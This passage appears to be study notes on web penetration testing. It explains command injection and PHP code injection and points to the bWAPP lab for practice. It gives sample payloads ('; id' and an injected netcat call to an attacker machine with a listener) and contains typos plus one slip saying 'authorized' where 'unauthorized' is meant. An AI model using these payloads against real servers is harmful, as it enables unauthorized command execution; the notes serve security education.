6.3 Command Injection
Command Injection
Command Injection vulnerabilties in the context of web app pt occur when an attacker can manipulate input fields of a web app in a way that allow them to execute OS commands on the underlying server.
This vulnerability is a serious security risk because it can lead to unauthorized access, data theft, and full compromise of the web server.
Main causes of this vulnerability are:
User Input Handling: web app often take user input through forms, query parameters, etc.
Lack of Input Sanitazion: insecurely coded app may fail to properly validate, sanitize or escape user inputs
Injection Points: attacker identify injection points such as input fileds or URL query parameters, where they can insert malicious commands
Exploitation
Attackers can exploit it crafting malicious input that includes special chars like ; | \ and other shell metachars to break out of the intended input context and inject their commands.
When the app processes the attacker's input, it constructs a shell command using the milicious input.
The server, believing the command to be legitimate, executes it in the underlyng OS.
Then, attackers can execute arbitrary commands with the privileges of the web server process, potentially leading to unauthorized data access and exfiltrate them, code execution or sistem compromise, manipulating the server, installing malware or create backdoors for future access.
Example
In an upload form we can upload a file and add at the end of URL this payload:
; id
to display the id and information of user that runs on the machine
If the web app don't respond it can't be vulnerable or can have a command injection blind, than we can try to take us in listening mode with netcat: nc -nvlp 4444
and and use ;nc <attacker_machine> 4444
and see if we can reach out our attacker machine from web app.
PHP Code Injection
PHP Code Injection also know as PHP Code Execution vulnerability occur when an attacker can inject and execute arbitrary PHP code within a web app.
It's more similat to generic command injection but regards only PHP code. Of course, they allow attackers to gain authorized access to the server, execute malicious actions and potentially compromise web app.
Practise
There's a dedicated module on BWapp vulnerable web app.
Last updated